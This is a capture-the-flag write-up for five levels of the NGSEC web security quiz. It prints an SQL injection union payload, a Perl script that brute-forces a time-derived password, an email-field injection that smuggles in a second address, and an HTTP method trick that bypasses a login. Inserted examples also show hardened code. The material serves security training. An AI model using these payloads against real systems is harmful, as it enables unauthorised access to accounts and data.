Level 1:
---------------------------------------

NOTE: This is not as easy as level 1 from the previous games.

URL: http://quiz.ngsec.com/game3/level1/index.php

View the source of the page; in the form, note 3 things:
[...]
[...]
[...]

Look at the JavaScript source for the form:
http://quiz.ngsec.com/game3/level1/ajax.js

Submitting the form you'll see the URL and args:
http://quiz.ngsec.com/game3/level1/ajax_auth_ver3.php?login=bla&password=bla&token=uWRMEAXs5TxWPDAuEBmLDeAg3bCHGl7B&token2=c4ca4238a0b923820dcc509a6f75849b&level=1

Note the filename: "ajax_auth_ver3.php". Looking for other versions of the file, the following also exist:
ajax_auth_ver1.php
ajax_auth_ver2.php

This level you're going at things blind, so ya have to gather as much info as you possibly can.

1: Reloading the page, token2 stays the same and token will always change.
2: They are md5 hashes. Since token2 stayed the same, decided to try and crack it (ngHashCrack):

D:\>ngHashCrack --incremental --md5 --hash c4ca4238a0b923820dcc509a6f75849b
ngHashCrack v1.0 by NGSEC Research Team
FREEWARE hash cracker
Next Generation Security Technologies
http://www.ngsec.com
Mode: Incremental
Algorithm: MD5
Hash: c4ca4238a0b923820dcc509a6f75849b
+ Checking words of 1 bytes...
Hash cracked with word: "1"
Hexadecimal Notation: "31"
D:\>

The cracked hash is the same as the level arg "level=1".

Checking for "Input Validation" on ajax_auth_ver1.php (probably less secure)...

1: SQL Injection
Input: http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login='&password='&token='&token2='&level='
Returns: Query String Tampered!

Narrowed down to.....
http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?token2=c4ca4238a0b923820dcc509a6f75849b&level=1
Returns: Error: invalid credentials.
Since the md5 hash is the same as the level, getting the md5 hash of "bla" and passing the same for "level" (level=bla) I get:
token2=128ecf542a35ac5270a87dc740918404
level=bla
http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?token2=128ecf542a35ac5270a87dc740918404&level=bla
Returns:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/ngsec/webs/quiz/game3/level1/ajax_auth_ver1.php on line 16
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ngsec/webs/quiz/game3/level1/ajax_auth_ver1.php on line 17
Error: SQL error.

Based on the provided error we know that we are getting to the database and it's MySQL, and it's not getting any results back, so we can assume the code probably looks something like..

[...]
$sql = "select user, pass from table where level = $level";
$result = mysql_query($sql);
$number = mysql_num_rows($result);
if($row = mysql_fetch_row($result)) {
    $user = $row[0];
    $pass = $row[1];
}
[...]
if($login == $user && $pass == $password) {
    //Authentication PASSED
} else {
    //Authentication FAILED
}

To verify that the SQL query wants an int rather than a varchar, using (token2 == md5 hash for '2') and (level=2):
http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?token2=c81e728d9d4c2f636f067f89cc14862c&level=2
Returns... Error: invalid credentials.

At this point the key to passing this level is by way of SQL Injection. A SQL statement like...
$sql = "select user, pass from table where level = 0 union select char(98,108,97), char(98,108,97)"
should result in the database returning a non-existent level but $user == "bla" and $pass == "bla", and authentication should succeed, but it doesn't, got the same Error (Error: SQL error.) :/

After much fiddling...
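The query pattern inferred above, as an added example that is not part of the writeup: a constructed in-memory SQLite table stands in for the quiz's MySQL table (table and column names are assumptions), the vulnerable lookup pastes `level` into the SQL string the way the guessed PHP does, and the hardened lookup rejects anything but a small integer and binds the value.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the quiz's credential table (assumed layout)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (level integer, user text, pass text)")
    db.execute("insert into users values (1, 'admin', 'real_secret')")
    return db


def lookup_vulnerable(db, level):
    """The pattern the writeup infers: the level parameter is interpolated
    into the SQL, so a union in it returns attacker-chosen credentials."""
    sql = "select user, pass from users where level = %s" % level
    return db.execute(sql).fetchone()


LEVEL_RE = re.compile(r"[0-9]{1,3}")


def lookup_hardened(db, level):
    """Same lookup with two fixes: the parameter must be a small
    non-negative integer, and it is bound rather than interpolated."""
    if not LEVEL_RE.fullmatch(str(level)):
        return None
    return db.execute("select user, pass from users where level = ?",
                      (int(level),)).fetchone()


def authenticate(lookup, db, level, login, password):
    """Mirror of the guessed PHP: whatever row comes back for the level
    becomes the expected username/password pair."""
    row = lookup(db, level)
    return row is not None and row == (login, password)


if __name__ == "__main__":
    db = make_db()
    payload = "0 union select char(98,108,97), char(98,108,97)"
    print("vulnerable:", authenticate(lookup_vulnerable, db, payload, "bla", "bla"))
    print("hardened:  ", authenticate(lookup_hardened, db, payload, "bla", "bla"))
```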
SOLVE:
level = 0 union select char(98,108,97)
login = bla
password = bla
token2 = 1c7c2cd06644e275c0970f323d1f59b3 (md5 hash for "0 union select char(98,108,97)")
token = khr7d3QMcMFc8Sm27mxLVRzAD85DspMq (Session token, dunno what this actually is and didn't take the time to crack it)

URL: http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=bla&password=bla&token=khr7d3QMcMFc8Sm27mxLVRzAD85DspMq&token2=1c7c2cd06644e275c0970f323d1f59b3&level=0%20union%20select%20char(98,108,97)

Congratulations please continue the login process here

So, resulting pseudo code turned out to be something like this...

//Check for passed vars for valid input...
//PHP magic quotes ?? or htmlspecialchars() ??
[...]
//Get Username
$sql = "select user from table where level = $level";
$result = mysql_query($sql);
$number = mysql_num_rows($result);
if($row = mysql_fetch_row($result)) {
    $user = $row[0];
}
[...]
//Get Password
$sql = "select pass from table where level = $level";
$result = mysql_query($sql);
$number = mysql_num_rows($result);
if($row = mysql_fetch_row($result)) {
    $pass = $row[0];
}
[...]
if($login == $user && $pass == $password) {
    //Authentication PASSED
} else {
    //Authentication FAILED
}

Level 2:
---------------------------------------

URL: http://quiz.ngsec.com/game3/level2/Zelda.php

Using the hints provided, my first guess was client/server date/time sync.
First had to set my local clock to the correct date/time:

[nocon > ntpdate time-b.nist.gov
 4 Sep 01:48:08 ntpdate[2496]: step time server 129.6.15.29 offset -18989.888691 sec
[nocon > date
Tue Sep 4 01:48:10 CDT 2007
[nocon >

Next had to see what the date/time was being sent/received:

[nocon-Micro-dev]:[2:04am] > date ; ./level2.pl ; date
Tue Sep 4 02:04:37 CDT 2007
Date: Tue, 04 Sep 2007 07:04:40 GMT
Client-Date: Tue, 04 Sep 2007 07:04:48 GMT
Password should had been: 0ed62d9dd3b675d1d0f6d4d78dc9024d
Tue Sep 4 02:04:48 CDT 2007
[nocon-Micro-dev]:[2:04am] >

Connection delay varies :(

[nocon-Micro-dev]:[2:05am] > date ; ./level2.pl ; date
Tue Sep 4 02:06:16 CDT 2007
Date: Tue, 04 Sep 2007 07:06:19 GMT
Client-Date: Tue, 04 Sep 2007 07:06:32 GMT
Password should had been: 9d685ca520bc820da6a581141b841152
Tue Sep 4 02:06:32 CDT 2007
[nocon-Micro-dev]:[2:06am] >

Looks like I have anywhere between 8s to 14s delay :(

Script(s):

hashcheck.pl
=========================================================================
#!/usr/bin/perl
#
# Walk the send/receive window one second at a time and find which
# epoch second the server hashed for its "Password should had been" value.
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);

my $CheckHash = '7df4b36cdb6960e2870921e986954189';   # hash the server reported
my $StartTime = '1188961004';                          # local time the request was sent
my $EndTime   = '1188961018';                          # local time the response arrived

my $i = 0;
while ($StartTime <= $EndTime) {
    my $NewHash = md5_hex($StartTime);
    if ($CheckHash eq $NewHash) {
        print "\nHash Found!\n";
        print "Delay: " . $i . "\n";
        print $StartTime . " - " . $NewHash . "\n";
        exit;
    }
    $i++;
    $StartTime++;
}
exit;
---------------------------------------------------------
[nocon] > ./hashcheck.pl
Hash Found!
Delay: 4
1188961008 - 7df4b36cdb6960e2870921e986954189
[nocon] >

level2.pl
==========================================================================
#!/usr/bin/perl
#
# Compute the time-based password (md5 of the unix time plus a guessed
# network delay) and keep submitting it until the server accepts one.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
use Digest::MD5 qw(md5_hex);

while (1) {
    # Date in unix format + 11sec delay (need a faster connection, heh)
    my $EpochTime = time;
    $EpochTime += 11;
    my $PasswdHash = md5_hex($EpochTime);

    my $URL = '';
    $URL .= 'http://quiz.ngsec.com/game3/level2/validate_Zelda.php?';
    $URL .= 'token=2GWpLAkdmJyYMhYFf9UnK2HdjXjenTWa';
    $URL .= '&';
    $URL .= 'token2=c81e728d9d4c2f636f067f89cc14862c';
    $URL .= '&';
    $URL .= 'level=2';
    $URL .= '&';
    $URL .= 'login=Admin';
    $URL .= '&';
    $URL .= 'password=' . $PasswdHash;
    print $URL . "\n";

    # User Agent
    my $UserAgent = LWP::UserAgent->new;
    $UserAgent->timeout(15);
    $UserAgent->agent('Mozilla/5.5 (compatible; MSIE 5.5; Windows NT 5.1)');

    # Make the request
    my $Request = HTTP::Request->new('GET');
    $Request->url($URL);
    my $Response = $UserAgent->request($Request);

    # Response headers: print the Date lines so the delay can be compared
    my @Headers = split(/\n/, $Response->headers_as_string);
    foreach my $Line (@Headers) {
        if ($Line =~ m/Date:/) {
            print $Line . "\n";
        }
    }

    # HTML body: report the expected password, or dump the whole page on success
    my @HTML = split(/\n/, $Response->content);
    foreach my $line (@HTML) {
        if ($line =~ m/Password should had been/) {
            print $line . "\n";
        }
        elsif ($line =~ m/Congratulations/i) {
            print $line . "\n";
            foreach my $out (@HTML) {
                print $out . "\n";
            }
            exit;
        }
    }
}
exit;
==================================================================================================
[nocon] > ./level2.pl
http://quiz.ngsec.com/game3/level2/validate_Zelda.php?token=2GWpLAkdmJyYMhYFf9UnK2HdjXjenTWa&token2=c81e728d9d4c2f636f067f89cc14862c&level=2&login=Admin&password=bdc735a8b50a53f34c28b1df721ff6b7
Date: Wed, 05 Sep 2007 17:15:04 GMT
Client-Date: Wed, 05 Sep 2007 17:15:09 GMT

Invalid Password, please synchronize your token generator.
Password should had been: e0cc44d0ec5e78acccecc78179c3e849

http://quiz.ngsec.com/game3/level2/validate_Zelda.php?token=2GWpLAkdmJyYMhYFf9UnK2HdjXjenTWa&token2=c81e728d9d4c2f636f067f89cc14862c&level=2&login=Admin&password=ee25e27977a615850bfcaa5c64abb412
Date: Wed, 05 Sep 2007 17:15:13 GMT
Client-Date: Wed, 05 Sep 2007 17:15:20 GMT

Invalid Password, please synchronize your token generator.
Password should had been: d5b8293fc991f83b9a2e5a20c88564b9

http://quiz.ngsec.com/game3/level2/validate_Zelda.php?token=2GWpLAkdmJyYMhYFf9UnK2HdjXjenTWa&token2=c81e728d9d4c2f636f067f89cc14862c&level=2&login=Admin&password=a016a6d13dcd6b37467b160d430e1449
Date: Wed, 05 Sep 2007 17:15:21 GMT
Client-Date: Wed, 05 Sep 2007 17:15:31 GMT

CONGRATULATIONS!!! Authentication Completed!

[....]
Level 2 Completed!

CONGRATULATIONS!!! Authentication Completed!

At this point you should update your score filling this form.

Not yet registered? Follow this link: Registration Form

Nickname
Password
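The Level 2 scheme the sessions above confirm, as an added example that is not part of the writeup: expected_password() is the quiz's md5-of-unix-time password, recover_offset() is hashcheck.pl's window search ported to Python, and keyed_token()/verify_keyed_token() are an assumed defender-side replacement (an HMAC over a 30-second step, accepted within one step of skew), not anything the quiz itself uses.

```python
import hashlib
import hmac


def expected_password(epoch):
    """The quiz's password as the writeup describes it: md5 of the unix time
    as a decimal string. No secret is involved, so anyone with a synchronised
    clock can compute it; only network delay gets in the way."""
    return hashlib.md5(str(epoch).encode()).hexdigest()


def recover_offset(server_hash, sent_at, received_at):
    """Port of hashcheck.pl: walk every second between the local send and
    receive times and report which one the server hashed, as
    (epoch, delay_in_seconds), or None if nothing in the window matches."""
    for delay, epoch in enumerate(range(sent_at, received_at + 1)):
        if expected_password(epoch) == server_hash:
            return epoch, delay
    return None


# Assumed defender-side alternative (not the quiz's code): a keyed HMAC over a
# time step, verified within +/-1 step, so the 8-14 s delay the writeup measured
# no longer rejects a legitimate client, while the value cannot be precomputed
# by anyone without the shared secret.
STEP_SECONDS = 30


def keyed_token(secret, epoch, step=STEP_SECONDS):
    counter = (epoch // step).to_bytes(8, "big")
    return hmac.new(secret, counter, hashlib.sha256).hexdigest()


def verify_keyed_token(secret, token, now, window=1, step=STEP_SECONDS):
    for k in range(-window, window + 1):
        candidate = keyed_token(secret, now + k * step, step)
        if hmac.compare_digest(candidate, token):
            return True
    return False


if __name__ == "__main__":
    # Constructed round trip: the server hashed the 4th second of a 14 s window.
    window_start = 1188961004
    reported = expected_password(window_start + 4)
    print(recover_offset(reported, window_start, window_start + 14))
```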
[....]
[nocon] >

Level 3:
-------------------------------------------

URL: http://quiz.ngsec.com/game3/level3/Snake_Eater.php

Jesus, this level is too fukin easy. The password reminder form sends an e-mail with username and password, so......
http://quiz.ngsec.com/game3/level3/admin/
admin@ngsec.com;your_email@domain.whatever (note the ";")
Weeeeeee

Level 4:
--------------------------------------------

URL: http://quiz.ngsec.com/game3/level4/Tyrell_Corporation.php
http://quiz.ngsec.com/game3/level4/TODO

Hint: "Level Under Construction. Developer read TODO list"

Coord SRC File: Weeeeeeeee....
http://quiz.ngsec.com/game3/level4/CHANGELOG
http://quiz.ngsec.com/game3/level4/level4_coordinates.txt

SOLVE:
http://quiz.ngsec.com/game3/level4/ajax_coord.php?login=Admin&password=NGSEC&coord1=E&coord2=4&c_value=dace&token=7ZHnCsFgxxXR7beHv4nlzXsAx4qx5EXs&token2=a87ff679a2f3e71d9181a67b7542122c&level=4
Bad Credentials!

Fuckers!! Arrays start with zero, not in this case.
http://quiz.ngsec.com/game3/level4/ajax_coord.php?login=Admin&password=NGSEC&coord1=E&coord2=5&c_value=dace&token=7ZHnCsFgxxXR7beHv4nlzXsAx4qx5EXs&token2=a87ff679a2f3e71d9181a67b7542122c&level=4
Congratulations please continue the login process here

Level 5:
--------------------------------------------

URL: http://quiz.ngsec.com/game3/level5/Manjushri.php

Solve:

[nocon] > cat level5.pl
#!/usr/bin/perl
#
# http://www.xav.com/perl/site/lib/lwpcook.html
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=97
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/8.0");    # pretend we are very capable browser

# mixed-case method name kept exactly as in the original script
my $req = HTTP::Request->new(Post => 'http://quiz.ngsec.com/game3/level5/Manjushri.php');
$req->header('Accept' => 'text/html');

# send request
my $res = $ua->request($req);

# check the outcome
if ($res->is_success) {
    print $res->decoded_content;
}
else {
    print "Error: " . $res->status_line . "\n";
}
exit;

[nocon] > ./level5.pl
[....]
Level 5 Completed!

CONGRATULATIONS!!! Authentication Completed!

At this point you should update your score filling this form.

Not yet registered? Follow this link: Registration Form

Nickname
Password
[....]